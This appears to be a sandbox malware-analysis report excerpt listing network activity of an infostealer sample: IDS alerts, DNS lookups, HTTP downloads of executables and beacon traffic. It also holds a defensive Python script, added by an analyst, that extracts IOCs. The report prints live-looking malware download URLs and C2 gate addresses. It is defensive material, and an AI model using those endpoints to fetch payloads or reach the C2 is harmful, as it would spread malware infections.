Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50081 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50085 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50078 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50084 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50082 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50090 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50089 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50076 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:49746
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1 Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1 Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"] equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: presticitpo.store
Source: global traffic DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic DNS traffic detected: DNS query: necklacedmny.store
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic DNS traffic detected: DNS query: normandy.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: normandy-cdn.services.mozilla.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
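The DNS queries and the HTTP request above, together with the "String found in binary or memory" entries that make up the rest of this section, are the raw material an analyst turns into an IOC list. The script below is an added example, not part of the Joe Sandbox report or its tooling. It parses report lines of exactly this shape, drops the Firefox/CA/search-engine background noise with an allowlist (the allowlist is an analyst assumption for this example, not something the report states), cuts the memory residue that is glued onto URLs ("def.exeat", ".php.5Y", "185.215.113.206Ey"), attributes each host to the process whose dump contained it, and flags the small form-encoded POST to /api as a beacon. That beacon rule is a heuristic built from the single request shown above (the report classifies the sample as LummaC but does not itself label the request) and would need tuning before use in detection. The sample lines are copied from this report.

```python
"""Extract network IOCs from sandbox report lines of the kind listed above."""
import ipaddress
import re
from collections import defaultdict

# Constructed sample: lines copied from the report above, memory residue suffixes included.
SAMPLE_LINES = [
    "Source: global traffic DNS traffic detected: DNS query: thumbystriw.store",
    "Source: global traffic DNS traffic detected: DNS query: necklacedmny.store",
    "Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net",
    "Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store",
    "Source: file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe",
    "Source: file.exe, 00000000.00000003.2336153066.0000000000A85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeat",
    "Source: file.exe, 00000000.00000003.2336374803.00000000009EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/mine/random.exesoft",
    "Source: num.exe, 00000030.00000002.3028252435.00000000014B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php.5Y",
    "Source: b76bb5cee7.exe, 0000000A.00000002.2767324044.000000000135E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206Ey",
    "Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0",
    "Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:",
]

# Analyst-chosen allowlist (an assumption of this example, not part of the report): browser
# telemetry/update hosts, CA/OCSP endpoints and search engines a Firefox sandbox contacts on its own.
BENIGN_SUFFIXES = (
    "mozilla.org", "mozilla.com", "mozilla.net", "mozgcp.net", "firefox.com", "getpocket.com",
    "google.com", "youtube.com", "facebook.com", "wikipedia.org", "wikimedia.org", "reddit.com",
    "fastly.net", "twitter.com", "example.org", "ipv4only.arpa", "digicert.com", "amazontrust.com",
    "lencr.org", "microsoft.com", "duckduckgo.com", "ecosia.org", "yahoo.com",
)

DNS_RE = re.compile(r"DNS query: (\S+)$")
HTTP_RE = re.compile(r"HTTP traffic detected: (.+)$")
STRING_RE = re.compile(r"^Source: (.*?) String found in binary or memory: (\S+)$")
HOST_RE = re.compile(r"^https?://([A-Za-z0-9.-]+)")
# URL on a bare IPv4 host. The optional path is cut at a file extension so that memory
# residue glued onto the string ("def.exeat", ".php.5Y") is discarded.
IP_URL_RE = re.compile(r"^https?://(\d{1,3}(?:\.\d{1,3}){3})(?::(\d+))?(/[\w./-]*?\.(?:exe|php|dll|zip|txt))?")


def is_benign(host: str) -> bool:
    """Allowlisted suffix at a label boundary. Trailing residue after the suffix ("digicert.com0")
    is tolerated; a further label ("mozilla.com.evil.store") is not."""
    return any(re.search(r"(?:^|\.)" + re.escape(s) + r"(?![.-])", host) for s in BENIGN_SUFFIXES)


def parse_http_request(text: str) -> dict:
    """Recover request fields from headers that the report ran together on one line."""
    req = {}
    if m := re.match(r"(GET|POST|PUT|HEAD) (\S+) HTTP/1\.[01]", text):
        req["method"], req["path"] = m.group(1), m.group(2)
    for key, pat in (("host", r"Host: ([A-Za-z0-9.:-]+)"), ("content_type", r"Content-Type: ([\w/+.-]+)"),
                     ("content_length", r"Content-Length: (\d+)")):
        if m := re.search(pat, text):
            req[key] = m.group(1)
    return req


def looks_like_lumma_beacon(req: dict) -> bool:
    """Shape of the request observed above: tiny form-encoded POST to /api. Heuristic, tune before use."""
    return (req.get("method") == "POST" and req.get("path") == "/api"
            and req.get("content_type", "").startswith("application/x-www-form-urlencoded")
            and int(req.get("content_length", "0")) <= 16)


def processes_from_source(src: str) -> set:
    """'file.exe, 00000000....sdmp, num.exe' -> {'file.exe', 'num.exe'} (dump ids removed)."""
    toks = [t.strip() for t in src.split(",")]
    return {t for t in toks if t and not re.fullmatch(r"[0-9A-Fa-f.]+\.sdmp", t)}


def extract_iocs(lines) -> dict:
    r = {"domains": set(), "ips": set(), "urls": set(), "beacons": set(),
         "by_process": defaultdict(set), "benign_dropped": 0}
    for line in lines:
        if m := DNS_RE.search(line):
            host = m.group(1)
            if is_benign(host):
                r["benign_dropped"] += 1
            else:
                r["domains"].add(host)
        elif m := HTTP_RE.search(line):
            req = parse_http_request(m.group(1))
            host = req.get("host", "")
            if host and not is_benign(host):
                r["domains"].add(host)
                if looks_like_lumma_beacon(req):
                    r["beacons"].add(host)
        elif m := STRING_RE.match(line):
            src, value = m.groups()
            if ipm := IP_URL_RE.match(value):
                ip, port, path = ipm.groups()
                try:
                    addr = ipaddress.ip_address(ip)
                except ValueError:  # dotted quad with an octet > 255: residue, not an IOC
                    continue
                if addr.is_private or addr.is_loopback:
                    r["benign_dropped"] += 1
                    continue
                r["ips"].add(ip)
                for proc in processes_from_source(src):
                    r["by_process"][proc].add(ip)
                if path:  # default port dropped so the ':80' variant dedupes with the plain form
                    r["urls"].add(f"http://{ip}{':' + port if port and port != '80' else ''}{path}")
            elif hm := HOST_RE.match(value):
                host = hm.group(1)
                if is_benign(host):
                    r["benign_dropped"] += 1
                else:
                    r["domains"].add(host)
                    for proc in processes_from_source(src):
                        r["by_process"][proc].add(host)
    return r
```

Run over the sample, `extract_iocs` yields the two .store domains (with necklacedmny.store marked as the beacon host), the two 185.215.113.x addresses, three cleaned download/gate URLs, and a per-process map showing that file.exe holds the .16 downloader URLs while num.exe and b76bb5cee7.exe hold the .206 gate. The allowlist is deliberately suffix-based so a benign host with residue appended is still dropped, but it will also hide a benign domain that an attacker deliberately embeds; treat the "benign_dropped" count as something to eyeball, not as ground truth.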
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: file.exe, file.exe, 00000000.00000003.2336212320.00000000052E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336153066.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: file.exe, 00000000.00000003.2336153066.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/9k3
Source: file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336374803.0000000000A01000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2834293641.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000003.2336153066.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exez
Source: efe6fe4127.exe, 00000009.00000003.2831918485.0000000000B76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: efe6fe4127.exe, 00000009.00000003.2834293641.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe3f
Source: file.exe, 00000000.00000003.2336153066.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeat
Source: file.exe, 00000000.00000003.2336153066.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exee
Source: file.exe, 00000000.00000003.2336153066.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeenn
Source: file.exe, 00000000.00000003.2336153066.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/p
Source: file.exe, 00000000.00000003.2336374803.00000000009EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/mine/random.exesoft
Source: file.exe, 00000000.00000003.2336374803.00000000009EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: b76bb5cee7.exe, 0000000A.00000002.2767324044.000000000135E000.00000004.00000020.00020000.00000000.sdmp, b76bb5cee7.exe, 0000001D.00000002.2967959553.000000000150B000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001F.00000002.2877033985.000000000081E000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000030.00000002.3028252435.00000000014B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: b76bb5cee7.exe, 0000000A.00000002.2767324044.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, b76bb5cee7.exe, 0000000A.00000002.2767324044.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, b76bb5cee7.exe, 0000001D.00000002.2967959553.000000000155C000.00000004.00000020.00020000.00000000.sdmp, b76bb5cee7.exe, 0000001D.00000002.2967959553.000000000150B000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001F.00000002.2877033985.0000000000861000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001F.00000002.2877033985.000000000081E000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000030.00000002.3028252435.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000030.00000002.3028252435.00000000014FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: num.exe, 00000030.00000002.3028252435.00000000014FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: num.exe, 00000030.00000002.3028252435.00000000014B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php.5Y
Source: b76bb5cee7.exe, 0000000A.00000002.2767324044.000000000135E000.00000004.00000020.00020000.00000000.sdmp, b76bb5cee7.exe, 0000000A.00000002.2767324044.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, b76bb5cee7.exe, 0000001D.00000002.2967959553.000000000155C000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000030.00000002.3028252435.00000000014FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: num.exe, 00000030.00000002.3028252435.00000000014FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/)
Source: b76bb5cee7.exe, 0000000A.00000002.2767324044.00000000013B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpV
Source: num.exe, 0000001F.00000002.2877033985.000000000081E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpW
Source: b76bb5cee7.exe, 0000000A.00000002.2767324044.00000000013B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpb
Source: num.exe, 0000001F.00000002.2877033985.000000000087E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpf
Source: b76bb5cee7.exe, 0000000A.00000002.2767324044.00000000013B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpz
Source: num.exe, 00000030.00000002.3028252435.00000000014B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/df
Source: b76bb5cee7.exe, 0000001D.00000002.2967959553.000000000155C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/i
Source: b76bb5cee7.exe, 0000001D.00000002.2967959553.000000000155C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/n7a
Source: b76bb5cee7.exe, 0000001D.00000002.2967959553.000000000155C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/p
Source: b76bb5cee7.exe, 0000000A.00000002.2767324044.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000030.00000002.3028252435.00000000014FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/ws
Source: b76bb5cee7.exe, 0000000A.00000002.2767324044.000000000135E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206Ey
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: efe6fe4127.exe, 0000000C.00000003.2962012796.0000000001A44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: U2242U1STHGPPKHG.exe, 0000001E.00000002.3017329025.0000000000CCC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.microsoft.c
Source: firefox.exe, 0000002E.00000003.2993412879.0000020F30ADB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2998404752.0000020F30AE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3054907147.0000020F382E9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3010408169.0000020F30DC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2993614274.0000020F30AC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000002E.00000003.2991326032.0000020F308BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2993734232.0000020F30A6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://src.chromium.org/viewvc/chrome/trunk/src/third_party/cld/languages/internal/languages.cc
Source: firefox.exe, 0000002E.00000003.2992240623.0000020F30853000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.google.com
Source: firefox.exe, 0000002E.00000003.2985342764.0000020F2CDAE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3015343703.0000020F2D163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3015863973.0000020F2D1C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3014817116.0000020F300D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2981512771.0000020F2FD38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2988235090.0000020F2CDAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000002E.00000003.2981399452.0000020F2FD43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul);
Source: firefox.exe, 0000002E.00000003.2981399452.0000020F2FD43000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/newlayout/xml/parsererror.xml);
Source: mozilla-temp-41.26.dr String found in binary or memory: http://www.videolan.org/x264.html
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2192287354.000000000550D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2679239829.0000000005729000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2843082489.00000000061EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
